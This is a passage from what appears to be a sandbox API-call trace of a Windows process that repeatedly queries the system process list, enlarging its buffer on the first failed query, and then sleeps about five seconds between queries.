RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 